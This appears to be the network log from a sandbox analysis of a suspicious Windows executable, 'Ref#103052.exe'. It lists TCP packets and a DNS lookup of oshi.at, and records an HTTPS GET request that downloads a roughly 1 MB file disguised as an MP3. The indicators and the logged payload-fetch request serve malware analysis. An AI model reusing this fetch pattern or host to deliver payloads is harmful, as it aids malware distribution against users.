                                                          Jan 9, 2025 08:26:21.459227085 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.459270000 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.459346056 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.459403038 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.459537983 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.459589958 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.459703922 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.459745884 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.459856033 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.459898949 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.460035086 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.460076094 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.460385084 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.460427999 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.460567951 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.460597038 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.460608006 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.460614920 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.460630894 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.460742950 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.460777044 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.460781097 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.460793018 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.460833073 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.460961103 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.460968018 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.461013079 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.461011887 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.461030960 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.461059093 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.461077929 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.461314917 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.461338997 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.461354017 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.461361885 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.461374998 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.505141973 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.567060947 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.567169905 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.567182064 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.567194939 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.567224026 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.567236900 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.567322969 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.567363977 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.567401886 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.567444086 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.567595005 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.567637920 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.567732096 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.567770004 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.567914963 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.567950010 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.568069935 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.568099022 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.568111897 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.568129063 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.568144083 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.568281889 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.568322897 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.568341970 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.568449974 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.568490982 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.568497896 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.568681002 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.568716049 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.568720102 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.568726063 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.568748951 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.568763971 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.568782091 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.568782091 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.568792105 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.568828106 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.569128036 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.569169998 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.569178104 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.614455938 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.687633991 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.687707901 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.687772036 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.687803030 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.687808037 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.687830925 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.687846899 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.687998056 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.688028097 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.688031912 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.688040018 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.688066959 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.688335896 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.688365936 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.688369036 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.688379049 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.688393116 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.688395023 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.688431978 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.688440084 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.688473940 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.688766003 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.688793898 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.688800097 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.688807011 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.688819885 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.688824892 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.688838005 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.688843012 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.688860893 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.689274073 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.689305067 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.689310074 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.689317942 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.689335108 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.689337969 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.689363003 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.689382076 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.689394951 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.689407110 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.739459991 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.764059067 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.764396906 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.764424086 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.764867067 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.795861959 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.795994997 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.796101093 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.796132088 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.796314001 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.796951056 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.796951056 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.796951056 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.796951056 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.796951056 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.796984911 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.797007084 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.797023058 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.797054052 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.797080040 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.797482014 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.797518015 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.797552109 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.797759056 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.797759056 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.797759056 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.797780037 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.797796965 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.798146009 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.798146009 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.798146009 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.798146009 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.850790024 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.851196051 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:21.851231098 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:21.851279974 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.001692057 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.001729012 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.001760960 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.001786947 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.001811981 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.051947117 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.132452011 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.132504940 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.132531881 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.132577896 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.132597923 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.132606030 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.132616997 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.132623911 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.132642984 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.132680893 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.132713079 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.132720947 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.132750988 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.132807970 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.132849932 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.132972002 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.133007050 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.133116007 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.133157015 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.133294106 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.133322001 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.133341074 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.133349895 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.133363008 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.133511066 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.133547068 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.133554935 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.133584976 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.133663893 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.133708000 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.133857012 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.133891106 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.133912086 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.133920908 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.133936882 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.134145975 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.134185076 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.134193897 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.134236097 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.134309053 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.134354115 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.134356022 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.134366989 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.134386063 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.134398937 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.134398937 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.134407997 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.134437084 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.134725094 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.134768009 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.134774923 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.134805918 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.218940973 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.219017029 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.219053984 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.219100952 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.241861105 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.241900921 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.241940975 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.241983891 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.242003918 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.242022038 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.242053986 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.242096901 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.242161989 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.242219925 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.242312908 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.242356062 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.242428064 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.242475033 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.242589951 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.242645979 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.242799997 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.242847919 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.242949963 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.242991924 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.243072033 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.243100882 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.243119955 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.243127108 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.243141890 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.243308067 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.243355036 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.243362904 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.243405104 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.243464947 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.243511915 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.243679047 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.243714094 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.243731976 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.243737936 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.243762970 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.243896961 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.243931055 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.243961096 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.244268894 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.244268894 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.244268894 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.244278908 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.244707108 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.449573994 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.449685097 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.449728966 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.449744940 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.449759007 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.449845076 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.449919939 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.449963093 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.450083017 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.450119972 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.450124025 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.450144053 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.450161934 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.450175047 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.450390100 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.450433969 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.450491905 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.450522900 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.450579882 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.450613976 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.450762033 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.450792074 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.450803041 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.450813055 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.450826883 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.451093912 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.451131105 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.451139927 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.451169968 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.451225042 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.451263905 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.463869095 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.463946104 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.463979006 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.464010000 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.464026928 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.464066029 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.464097977 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.464135885 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.464145899 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.464220047 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.464289904 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.464354992 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.464401007 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.464463949 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.464472055 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.464497089 CET44349704194.15.112.248192.168.2.7
                                                          Jan 9, 2025 08:26:22.464508057 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.464530945 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:26:22.470733881 CET49704443192.168.2.7194.15.112.248
                                                          Jan 9, 2025 08:27:00.418972015 CET5366253192.168.2.7162.159.36.2
                                                          Jan 9, 2025 08:27:00.423818111 CET5353662162.159.36.2192.168.2.7
                                                          Jan 9, 2025 08:27:00.423885107 CET5366253192.168.2.7162.159.36.2
                                                          Jan 9, 2025 08:27:00.428658962 CET5353662162.159.36.2192.168.2.7
                                                          Jan 9, 2025 08:27:00.890193939 CET5366253192.168.2.7162.159.36.2
                                                          Jan 9, 2025 08:27:00.897196054 CET5353662162.159.36.2192.168.2.7
                                                          Jan 9, 2025 08:27:00.897346973 CET5366253192.168.2.7162.159.36.2

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jan 9, 2025 08:26:16.209492922 CET6416953192.168.2.71.1.1.1
                                                          Jan 9, 2025 08:26:16.230498075 CET53641691.1.1.1192.168.2.7
                                                          Jan 9, 2025 08:27:00.418504953 CET5362041162.159.36.2192.168.2.7
                                                          Jan 9, 2025 08:27:00.910553932 CET53549861.1.1.1192.168.2.7

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Jan 9, 2025 08:26:16.209492922 CET192.168.2.71.1.1.10x6f41Standard query (0)oshi.atA (IP address)IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Jan 9, 2025 08:26:16.230498075 CET1.1.1.1192.168.2.70x6f41No error (0)oshi.at194.15.112.248A (IP address)IN (0x0001)false
                                                          Jan 9, 2025 08:26:16.230498075 CET1.1.1.1192.168.2.70x6f41No error (0)oshi.at5.253.86.15A (IP address)IN (0x0001)false

                                                          HTTP Request Dependency Graph

                                                          • oshi.at

                                                          HTTPS Proxied Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.749704194.15.112.2484437060C:\Users\user\Desktop\Ref#103052.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-09 07:26:18 UTC186OUTGET /STEq HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                          Host: oshi.at
                                                          Connection: Keep-Alive
                                                          2025-01-09 07:26:19 UTC303INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Thu, 09 Jan 2025 07:26:18 GMT
                                                          Content-Type: audio/mpeg
                                                          Content-Length: 1056776
                                                          Connection: close
                                                          ETag: "e91cba3cc44ffd908da5f2a3ec594514"
                                                          Content-Disposition: attachment; filename=OZoS.mp3
                                                          Accept-Ranges: bytes
